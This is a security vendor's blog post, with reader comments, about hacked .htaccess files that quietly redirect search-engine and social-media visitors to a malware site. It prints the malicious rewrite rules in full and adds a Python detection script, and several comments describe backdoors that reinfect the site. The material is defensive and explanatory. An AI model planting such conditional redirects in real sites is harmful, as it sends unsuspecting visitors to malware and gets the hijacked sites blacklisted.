Sucuri Blog

Conditional redirects (or the htaccess malware)

April 13, 2010, by David Dede

We see all types of malware daily, but one of them seems to cause a lot of confusion for our users (and everyone in general). This is the common question we hear:

“Some users are complaining that when they search for my site on Google, they are redirected to a site full of malware/virus/spam, but when I access it, it looks fine. I even scanned it with multiple anti-virus programs and they didn’t detect anything.”

What that means is that someone hacked your site and modified your .htaccess file to redirect users coming from Google to a malware-infested site. Because of that, you end up blacklisted and losing users who can’t reach your site (well, at least 99% of the time this is the cause).

This is what the modified .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* https://badsite.com [R,L]

On some sites we even see these conditional redirects for users coming from Twitter, MySpace, LinkedIn, etc.:

..
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
..

The reason most desktop anti-virus products (or malware scanners) won’t detect this when you scan your files is that they don’t understand the .htaccess file and won’t follow the redirection. Sucuri’s scanner, on the other hand, detects it and alerts on it.

How to fix it?

Fixing this redirection is very simple: you just need to delete these entries from your .htaccess file (you can have more than one, so check all your directories) and you are set. However, you still have to verify that you don’t have anything else hidden in there, so do a full scan of your website to make sure you are clean.
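One way to automate that directory check, as an added example that is not from the original post: a small Python scanner that walks a web root, parses every .htaccess it finds, and flags any RewriteRule whose preceding RewriteCond chain on %{HTTP_REFERER} would fire for a search-engine or social referer and whose target is a host other than your own (an absolute URL as the RewriteRule target is an implicit redirect, with or without the R flag). The probe referers and the sample .htaccess are constructed; the patterns are in Apache's regex dialect, which Python compiles fine for the simple cases seen above, and any pattern that fails to compile is skipped rather than guessed at.

```python
import os
import re

# Constructed probe referers: a RewriteCond on %{HTTP_REFERER} counts as search/social-gated if it matches any.
PROBE_REFERERS = ("https://www.google.com/search?q=example",
                  "https://www.bing.com/search?q=example",
                  "https://twitter.com/someone/status/1")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)  # absolute URL target = redirect

def _gated_on_probe_traffic(patterns):
    for pat in patterns:
        try:
            rx = re.compile(pat, re.I)
        except re.error:
            continue  # pattern not parseable as a Python regex: skip rather than guess
        if any(rx.search(ref) for ref in PROBE_REFERERS):
            return True
    return False

def find_conditional_redirects(htaccess_text, site_host):
    """Return [(line_no, target_url)] for rules that send referer-matched visitors off-site."""
    findings, pending = [], []  # pending: HTTP_REFERER conditions before the next RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        if m := COND_RE.match(line):
            pending.append(m.group(1))
        elif m := RULE_RE.match(line):
            host = re.sub(r"^https?://", "", m.group(1), flags=re.I).split("/")[0].lower()
            if host != site_host.lower() and _gated_on_probe_traffic(pending):
                findings.append((lineno, m.group(1)))
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings

def scan_tree(root, site_host):
    """Check every .htaccess under root; the malware can drop one in each directory."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits[path] = find_conditional_redirects(fh.read(), site_host)
    return {p: f for p, f in hits.items() if f}

# Constructed sample: a legitimate same-site canonicalisation rule, then the malicious block.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC]
RewriteRule ^(.*)$ https://example.com/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteRule .* https://badsite.com [R,L]
"""
```

Run scan_tree("/path/to/webroot", "example.com") against a copy of the site; the legitimate www-to-bare-host rule in the sample is not reported because its target is your own host.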

In addition to that, you still need to fix the problem that allowed you to get hacked. Most of the time that means updating your web application (WordPress, Joomla, etc.), changing your passwords and cleaning your desktop.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit https://sucuri.net or just send us an email at contact@sucuri.net.


Categories: Website Security
Tags: Conditional Malware, Hacked Websites, Redirects, SEO Spam, Server Security

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Rafael Torrales

    October 17, 2010

    very helpful, thanks

  2. Brent Lagerman

    April 4, 2011

    I really love you guys, thanks for fixing up our sites, you provide an amazing service — I’m really happy to have found someone we can trust to remove malware!

    brent @ mimoYmima.com

  3. Jon

    June 11, 2011

    Thank you so much !
    I was really stressed out and frustrated from getting nowhere with my malware infected site.
    Your scanner helped me fix up my site !

    Much appreciated

  4. Tim Jeter

    September 22, 2011

    this is good information, however my site(s) are infected in this very manner, but cleaning them does not solve the problem. When I download the .htaccess file, clean it, and upload it again, it immediately becomes infected. I download it again and ‘bam,’ infected.

    So apparently in my case there is other malicious code that can not only detect when the .htaccess is modified, but actively revert it back to its infected state.

    Any ideas?

    • Josh

      October 5, 2011

      I am also having this issue. When I modify or even remove the htaccess file(s), they reappear moments later with the offending code. Any advice?

      • Erika

        October 17, 2011

        this also happened to me. I’ve removed almost everything I had up on the site. I have a subdomain with no .htaccess and no index.php and I’m now seeing this redirect there.

      • rectorgroup LT

        February 7, 2012

        Firstly download all infected ftp to your computer, with Notepad++ find all files with this “<?php @error_reporting(0); if". Then delete them; after you have done it, delete the malware from .htaccess. Delete all your old ftp, and upload the fixed ftp. Done 🙂

  5. Guestas

    February 3, 2012

    I had the same problem, very confusing I’d say. Thanks for info!

  6. joell lapitan

    February 14, 2012

    it is not on htaccess

  7. joell lapitan

    February 14, 2012

    it is in the htaccess.. sorry

  8. Roelf

    May 8, 2012

    thank you so much, can I change the attributes of the .htaccess file to 444 or is it not advisable?
    I have changed it to 444 and it seems to work.

  9. webbinit

    August 28, 2012

    I have the same issue as below. Remove the infected htaccess file and upload new fresh one and straight away it’s infected again. Not sure what to do???

    • sushant

      September 9, 2012

      I have the same problem: there is a .htaccess file, and if I delete it, it comes back in a few seconds, and this has spread across my whole hosting account, meaning every directory.

      • Joe

        October 6, 2012

        Yup same here. A bunch of .htaccess files are being created under every folder and when they get deleted, after a bit they seem to be recreated. I would love to know how that script or malicious file got in my website directory and how to get rid of it! ugh, basically took down all my websites. Anyone with ideas, please chime in!

        • Sushant Garg

          October 6, 2012

          OK, when I got this problem I found a backdoor in my website.
          Please try to find it; I found a Joomla 1.5 backdoor in the images folder.

        • dante_hwd

          October 8, 2012

          Hi,
          I just cleaned out the third site with this issue.
          What is happening is that a file/page was injected into your site. This page gets called from the outside every x minutes (in my last case it was 15 minutes) and it will overwrite any .htaccess it can find.
          The only way out of this is to find the page first, remove it and then get rid of the affected .htaccess. Of course the challenge then is to identify how the page got in.
          Good luck

  10. CERO

    October 30, 2012

    I had another variant of this thing infecting my site.. The culprit was IP 37.59.62.209 accessing the IMAGES FOLDER.. check for weird PHP files here.. in my case.. there were 2 PHP files.. one in the STORIES directory… that had a codified code similar to the one shown in this page (I suppose to download the latest malware) and the other in /images/banners/.cache_s75tfl.php. Note that the behavior is VERY SIMILAR.. I found this file because it was constantly creating the .log file.. I am still not sure if I cleaned my server completely.

  11. Brian Ducharme

    November 4, 2012

    I had this problem infect my server from a Joomla website that was not up-to-date. I cleaned it from all the websites except for 1 where I cannot find the issue. It is just a plain HTML website, no PHP files, no .htaccess file, no JavaScript, but when I run it through the scans it comes back as redirecting to malware sites. Any ideas? I’m at a loss. The site is cookeassociates.net.
